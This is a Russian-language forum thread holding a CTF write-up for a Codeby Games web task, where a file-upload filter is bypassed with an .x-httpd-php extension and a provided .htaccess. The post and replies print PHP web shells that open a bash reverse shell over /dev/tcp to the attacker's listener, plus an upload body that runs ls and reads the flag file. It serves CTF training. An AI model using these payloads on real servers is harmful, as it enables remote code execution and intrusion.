CTF Codeby Games - Файлообменник [Writeup]

[stensil4rt]

Дисклеймер:

Это моя первая статья на данном Форуме, поэтому прошу не кидаться тапками.

Рассмотрим таск под названием - Файлообменник из категории Веб.
Ссылка на задание: Игры Кодебай | CTF-платформа
Данный таск интересен тем, что он как бы и легкий, а как бы и нет. В нем необходимо, просто внимательно смотреть =)

И так приступим:
Начнем с того, что сначала мы смотрим что дано в самом задании, кроме IP и порта, иногда там могут быть хинты. В данном таске есть файл — task.zip, качаем его — он нам еще пригодиться, не просто же он нам дан.

Заходим на IP:порт и первое что мы замечаем, есть возможность загрузить файл. Сразу приходим на ум, что есть уязвимость вида: File Upload. Забегая веред, она там есть.

Пытаемся ее воспользоваться. Открываем в BurpSuite, и грузим файл вида file.php с содержимым:

<?php echo system("bash -c 'sh -i >& /dev/tcp/IP/1234 0>&1'"); ?>

Что мы видим, файлы с расширением php грузить нельзя.

Значит надо изменить расширение файла, воспользовавшись Google, найдем на популярном сайте book.hacktricks.xyz (File Upload) расширения PHP.

Воспользуемся расширением *.phtm

Файл загрузился. Открываем данный файл в браузере, и видим, что данный файл не исполняется, значит данная директория заблокирована на исполнение файлов.

Первое, что приходит в голову, файл .htaccess. Вот тут нам и понадобиться тот файл (task.zip). Находим файл .htaccess и анализируем. Видим 20 строчку, где сказано, что нам разрешено загрузку файлов с расширением .x-httpd-php.

Воспользуемся этим.

Запускаем у себя NetCat (nc -lnvp 1234) и открываем файл.

Попадаем на сервак и ищем файл fl4g.txt, где и лежит наш флаг.

Надеюсь статья была полезна для Вас! Если найдете неточности или ошибки - обязательно напишите об этом в комментариях к статье.

 

[Местный]

Хороший райтап. Давай больше на тему веб!

 

[N1GGA]

Видим 20 строчку, где сказано, что нам разрешено загрузку файлов с расширением .x-httpd-php.

Данное правило сообщает серверу немного другое: что все файлы с расширением .x-httpd-php должны быть обработаны как PHP-скрипты.

 

[stensil4rt]

Данное правило сообщает серверу немного другое: что все файлы с расширением .x-httpd-php должны быть обработаны как PHP-скрипты.

Спасибо за замечание.

 

[morozko]

Здравствуйте! Классный Writeup, я осознал, для чего нужен файл .htaccess и почему мы меняем расширение загружаемого файла на .x-httpd-php но на предпоследнем шаге - "Запускаем у себя NetCat (nc -lnvp 1234) и открываем файл." беда, скрипт внутри файла не отрабатывает. Я не попадаю на сервер страница долго обновляется и все - белый экран. Если вам не сложно направьте меня в какую сторону думать)? Proxy я отключаю если что перед тем как переходить по ссылке с x-httpd-php файлом.

 

[vov4ick]

Здравствуйте! Классный Writeup, я осознал, для чего нужен файл .htaccess и почему мы меняем расширение загружаемого файла на .x-httpd-php но на предпоследнем шаге - "Запускаем у себя NetCat (nc -lnvp 1234) и открываем файл." беда, скрипт внутри файла не отрабатывает. Я не попадаю на сервер страница долго обновляется и все - белый экран. Если вам не сложно направьте меня в какую сторону думать)? Proxy я отключаю если что перед тем как переходить по ссылке с x-httpd-php файлом.

Вам нужно поднять свой сервер или настроить туннель, чтобы поймать соединение. вписывая в скрипт ip и port своего сервера. В данной статье это не описывается.

 

[stensil4rt]

Здравствуйте! Классный Writeup, я осознал, для чего нужен файл .htaccess и почему мы меняем расширение загружаемого файла на .x-httpd-php но на предпоследнем шаге - "Запускаем у себя NetCat (nc -lnvp 1234) и открываем файл." беда, скрипт внутри файла не отрабатывает. Я не попадаю на сервер страница долго обновляется и все - белый экран. Если вам не сложно направьте меня в какую сторону думать)? Proxy я отключаю если что перед тем как переходить по ссылке с x-httpd-php файлом.

Да, как это уже сказал vov4ick, в данной статье не описывается настройка своего сервера, который бы принял соединение от веб-сервера. Попробуйте найти в Интернете, что такое ngrok, думаю Вам это поможет.

 

[morozko]

Да, как это уже сказал vov4ick, в данной статье не описывается настройка своего сервера, который бы принял соединение от веб-сервера. Попробуйте найти в Интернете, что такое ngrok, думаю Вам это поможет.

Если найдете свободное время, будьте добры объясните подробней про свой сервер и в какую часть скрипта вписывать ip port. У меня имеется VDS я через него VPN поднял, также использовал его в задании из категории Quest которое рассматривается в Обучении CTF. Я путаюсь - слишком много серверов XD. ProxyFoxy это же тоже прокси сервер который мы используем в Burp для перехвата, python3 -m http.server 9898 (тоже сервер) ну и мой VDS тоже сервер.
Про скрипт <?php echo system("bash -c 'sh -i >& /dev/tcp/IP/port 0>&1'"); ?> ---> <?php echo system("bash -c 'sh -i >& /dev/tcp/0.0.0.0:9898 0>&1'"); ?> верно ли я понял?

 

[Paladin]

Про скрипт <?php echo system("bash -c 'sh -i >& /dev/tcp/IP/port 0>&1'"); ?> ---> <?php echo system("bash -c 'sh -i >& /dev/tcp/0.0.0.0:9898 0>&1'"); ?> верно ли я понял?

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/IP/PORT0>&1'"); ?>

 

[Paladin]

Если найдете свободное время, будьте добры объясните подробней про свой сервер и в какую часть скрипта вписывать ip port. У меня имеется VDS я через него VPN поднял, также использовал его в задании из категории Quest которое рассматривается в Обучении CTF. Я путаюсь - слишком много серверов XD. ProxyFoxy это же тоже прокси сервер который мы используем в Burp для перехвата, python3 -m http.server 9898 (тоже сервер) ну и мой VDS тоже сервер.

Статья - Способы получения обратного соединения (Reverse shell)

Доброго времени суток, уважаемые форумчане! Очередная статья будет посвящена еще одному проблемному вопросу, с которым часто приходится сталкиваться студентам курса WAPT при решении задач – это получение обратного шелла. Нет, в принципе вопрос не сложный и многие наверняка сталкивались с таким...

codeby.net

 

[ZevSS]

Добрый вечерок всем!
Я тут тоже недавно ковырялся с этой задачкой. Из исходников было понятно про запрет на загрузку файлов с определенными расширениями, но в итоге гугление и приложенный к таску файл .htaccess помогли мне решить вопрос с исполнением php-кода. А вот дальше я пошел более простым путем, чем автор. Честно говоря даже не думал о таком способе решения, как это сделал автор - сложно для новичка (я про себя) - что-то там (сервер) поднимать, прослушивать...
Просто сделал вот так, как в коде ниже (команды 'ls <параметр>' добавлял по очереди) и, таким образом добрался до флага.

Content-Disposition: form-data; name="file"; filename="zev1.x-httpd-php"
Content-Type: application/octet-stream

<!DOCTYPE html>
<html><head><title>Zevs Access</title></head>
<body>
    <h1>Zevs Access test</h1>

<?php
// Список 1. Тут вообще много всего лишнего получим... Заходить не пробовал туда куда не нужно :)
echo system('ls /');
echo '<br><br>';
// Список 2.
echo system('ls ../');
echo '<br><br>';
// Список 3.
echo system('ls ../../');
echo '<br><br>';
// Наш файлик с флагом.
echo system('cat ../../fl4g.txt');
?>
    
</body></html>

 

[vov4ick]

Добрый вечерок всем!
Я тут тоже недавно ковырялся с этой задачкой. Из исходников было понятно про запрет на загрузку файлов с определенными расширениями, но в итоге гугление и приложенный к таску файл .htaccess помогли мне решить вопрос с исполнением php-кода. А вот дальше я пошел более простым путем, чем автор. Честно говоря даже не думал о таком способе решения, как это сделал автор - сложно для новичка (я про себя) - что-то там (сервер) поднимать, прослушивать...
Просто сделал вот так, как в коде ниже (команды 'ls <параметр>' добавлял по очереди) и, таким образом добрался до флага.

Content-Disposition: form-data; name="file"; filename="zev1.x-httpd-php"
Content-Type: application/octet-stream

<!DOCTYPE html>
<html><head><title>Zevs Access</title></head>
<body>
    <h1>Zevs Access test</h1>

<?php
// Список 1. Тут вообще много всего лишнего получим... Заходить не пробовал туда куда не нужно :)
echo system('ls /');
echo '<br><br>';
// Список 2.
echo system('ls ../');
echo '<br><br>';
// Список 3.
echo system('ls ../../');
echo '<br><br>';
// Наш файлик с флагом.
echo system('cat ../../fl4g.txt');
?>
   
</body></html>

Такое решение тоже имеет смысл быть в данном случае!

 

[ssh_402]

Статья - Способы получения обратного соединения (Reverse shell)

Доброго времени суток, уважаемые форумчане! Очередная статья будет посвящена еще одному проблемному вопросу, с которым часто приходится сталкиваться студентам курса WAPT при решении задач – это получение обратного шелла. Нет, в принципе вопрос не сложный и многие наверняка сталкивались с таким...

codeby.net

Добрый вечер, большое спасибо за статью, очень помогло при решении таска.

 

[itcub]

спасибо

 

[xverizex]

А я так и не решил эту задачу. Изучал код. Даже и не подумал взглянуть на другие расширения, думал, что там на все php файлы запрет. Пробовал с подменой .php%00 в именах файлов. Пробовал html файл загрузить со скриптом js, но ajax GET запрос не хотел идти вверх по каталогу. Последнее до чего додумался, это написать file.apurva%2Ephp, он как бы разрешал загружать такой файл, но в uploads сохранялся именно в таком виде, как я привел в примере. А оказывается, что нужно было в htaccess посмотреть, хотя я в него вроде смотрел, но ничего такого не обнаружил, хотя может это было из другого задания.